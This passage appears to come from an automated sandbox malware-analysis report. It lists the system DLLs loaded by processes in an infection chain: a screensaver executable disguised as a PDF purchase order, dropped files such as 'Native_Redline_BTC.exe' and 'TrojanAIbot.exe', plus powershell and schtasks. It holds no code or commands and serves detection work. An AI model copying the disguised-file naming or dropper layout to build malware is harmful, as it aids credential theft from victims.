                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Section loaded: wsock32.dll
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Section loaded: version.dll
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Section loaded: winmm.dll
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Section loaded: mpr.dll
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Section loaded: wininet.dll
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Section loaded: userenv.dll
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Section loaded: uxtheme.dll
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Section loaded: windows.storage.dll
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Section loaded: wldp.dll
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Section loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: winhttp.dll
                            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: mpr.dll
                            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: secur32.dll
                            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: dnsapi.dll
                            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: iphlpapi.dll
                            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: ntmarta.dll
                            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: windows.storage.dll
                            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: wldp.dll
                            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: uxtheme.dll
                            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: propsys.dll
                            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: profapi.dll
                            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: edputil.dll
                            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: urlmon.dll
                            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: iertutil.dll
                            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: srvcli.dll
                            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: netutils.dll
                            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: windows.staterepositoryps.dll
                            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: wintypes.dll
                            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: appresolver.dll
                            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: bcp47langs.dll
                            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: slc.dll
                            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: userenv.dll
                            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: sppc.dll
                            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: onecorecommonproxystub.dll
                            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Section loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Section loaded: winhttp.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Section loaded: mpr.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Section loaded: secur32.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Section loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Section loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Section loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Section loaded: ntmarta.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Section loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Section loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Section loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Section loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Section loaded: amsi.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Section loaded: userenv.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Section loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Section loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Section loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Section loaded: gpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Section loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Section loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Section loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Section loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Section loaded: wbemcomn.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Section loaded: rasapi32.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Section loaded: rasman.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Section loaded: rtutils.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Section loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Section loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Section loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Section loaded: dhcpcsvc.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Section loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Section loaded: webio.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Section loaded: rasadhlp.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Section loaded: fwpuclnt.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Section loaded: schannel.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Section loaded: mskeyprotect.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Section loaded: ntasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Section loaded: ncrypt.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Section loaded: ncryptsslp.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Section loaded: vaultcli.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\alg.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\alg.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\alg.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\alg.exe Section loaded: mpr.dll
Source: C:\Windows\System32\alg.exe Section loaded: secur32.dll
Source: C:\Windows\System32\alg.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\alg.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\alg.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\alg.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\alg.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\alg.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\alg.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\alg.exe Section loaded: webio.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: appvpolicy.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: userenv.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: wtsapi32.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: netapi32.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: secur32.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: wininet.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: netutils.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: samcli.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: mpr.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: appmanagementconfiguration.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: version.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: tapi32.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: credui.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxstiff.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: winhttp.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: mpr.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxsresm.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: ualapi.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
                            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dbghelp.dll
                            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: winhttp.dll
                            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: mpr.dll
                            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: secur32.dll
                            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: sspicli.dll
                            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dnsapi.dll
                            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: iphlpapi.dll
                            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: ntmarta.dll
                            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: version.dll
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: msasn1.dll
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: winhttp.dll
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: mpr.dll
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: secur32.dll
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: sspicli.dll
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: dnsapi.dll
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: iphlpapi.dll
